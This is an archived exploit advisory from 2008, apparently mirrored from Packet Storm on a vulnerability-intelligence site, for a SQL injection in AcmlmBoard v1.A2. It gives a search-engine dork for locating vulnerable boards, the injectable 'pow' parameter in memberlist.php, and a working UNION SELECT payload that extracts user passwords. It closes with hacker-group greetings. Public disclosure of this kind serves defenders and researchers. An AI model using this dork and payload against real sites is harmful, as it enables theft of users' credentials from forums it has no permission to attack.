Lucene search
acmlmboard-sql.txt
๐๏ธย 30 Jun 2008ย 00:00:00Reported byย h0yt3rTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 23ย Views
AcmlmBoard v1.A2 SQL Injection Vulnerability, allows attackers to extract sensitive information from the database by injecting unexpected SQL queries
Show more
`
######################
#
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo30 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4